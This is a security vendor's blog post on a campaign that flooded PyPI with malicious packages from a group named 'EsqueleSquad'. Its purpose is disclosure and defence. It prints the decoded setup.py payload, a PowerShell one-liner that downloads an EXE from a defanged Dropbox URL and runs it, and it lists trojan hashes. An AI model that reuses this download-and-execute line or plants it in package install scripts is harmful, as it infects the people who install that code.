Sonatype has been tracking an open source malware campaign developing over the weekend in which a threat actor is infiltrating the PyPI software registry with thousands of malicious packages. These packages are being rapidly removed by the PyPI admins as they come up, but the behavior continues well into today.
The reports of this activity were first brought to our notice by security researcher Félix Aimé.
Downloads Windows trojan from Dropbox
We observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily. All of them contain the description, “A library for creating a terminal user interface.”
Although these packages are rapidly being purged as they appear on PyPI, Sonatype’s malware archives continue to retain copies of these malicious artifacts.
Based on our analysis, these packages contain identical payload targeting Windows users, as shown below.
The ‘setup.py’ (manifest file) within these packages contains a one-liner payload which is base64-encoded:
The malicious code (line 9) in question invokes a PowerShell command on an infected Windows machine to download second-stage infection from a Dropbox URL:
powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" -OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"
Thankfully, at the time of our analysis, Dropbox has suspended the offending URL, although we were still able to obtain the malicious copies of the executable from another source: 
The malicious EXEs (IOCs below) being downloaded by the illicit packages are Windows trojans with potential spyware and info-stealing code:
- WindowsCache.exe:
8ab8ddfa3f61334cf9386b62aea3a761852b3d785d9f21b8a638cc42b0af7afd [VirusTotal] - update.exe:
51162376051669cbf4d2b11b1300ba7be6758ca0ca1979ce736fe70ae7289bc2 [VirusTotal]
The threat actor publishing these packages calls themselves 'EsqueleSquad’ and interestingly has mentioned their email address and website, “www.esquelesquad[.]rip” within these packages:
It is still not clear what purpose the threat actor is trying to achieve, mainly because despite containing working malicious payload, the packages are named in a confusing manner with no obvious targets. The malicious influx of packages in batches is continuing at the time of writing and our researchers continue to monitor the situation.
In late 2022, threat actors had flooded the PyPI and npm registries with over 200 cryptominers. In early 2021, we saw more than 5,000 dependency confusion packages infiltrating both open source registries.
Users of Sonatype Repository Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.
